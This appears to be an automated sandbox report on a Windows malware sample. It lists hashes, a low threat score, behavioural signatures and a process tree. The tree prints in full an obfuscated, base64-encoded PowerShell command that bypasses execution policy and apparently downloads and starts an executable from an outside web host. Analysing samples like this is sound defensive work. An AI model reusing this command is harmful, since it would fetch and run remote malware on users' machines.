Analysis
-
max time kernel
135s -
max time network
86s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
16-07-2020 06:19
Static task
static1
Behavioral task
behavioral1
Sample
6115b75d6dea7d18c4c335daee062579.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
6115b75d6dea7d18c4c335daee062579.exe
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
6115b75d6dea7d18c4c335daee062579.exe
-
Size
847KB
-
MD5
6115b75d6dea7d18c4c335daee062579
-
SHA1
edd36175f46101077bd6946a2324e10c4c3f73aa
-
SHA256
b0b9e3dc8734f410aa2312b54b09cd299d427f0b04b5c57c5cccc0b58fe966fa
-
SHA512
85ff43706d9e45c376bc72bb4040b5ad0e3480f479074758502e217e82f46021eddafbd9eef08a1b5d0ecb8e64bdcb15043643f858a8bf7eb2ee95da6369aaaf
Score
3/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1516 wrote to memory of 4056 1516 6115b75d6dea7d18c4c335daee062579.exe 66 PID 1516 wrote to memory of 4056 1516 6115b75d6dea7d18c4c335daee062579.exe 66 PID 1516 wrote to memory of 4056 1516 6115b75d6dea7d18c4c335daee062579.exe 66 -
Program crash 1 IoCs
pid pid_target Process procid_target 500 4056 WerFault.exe 66 -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeRestorePrivilege 500 WerFault.exe Token: SeBackupPrivilege 500 WerFault.exe Token: SeDebugPrivilege 500 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe 500 WerFault.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6115b75d6dea7d18c4c335daee062579.exe"C:\Users\Admin\AppData\Local\Temp\6115b75d6dea7d18c4c335daee062579.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwADoALwAvAHYAaQBjAHQAbwByAGMAYQBsAHYAbwBhAHIAcQB1AGkAdABlAGMAdABvAC4AZQBzAC8AMQAvAGIAaQBuAGEALgBlAHgAZQAdICAALAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABNAGQAUABTAHYAZwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABNAGQAUABTAHYAZwAuAGUAeABlAB0g2⤵PID:4056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:500
-
-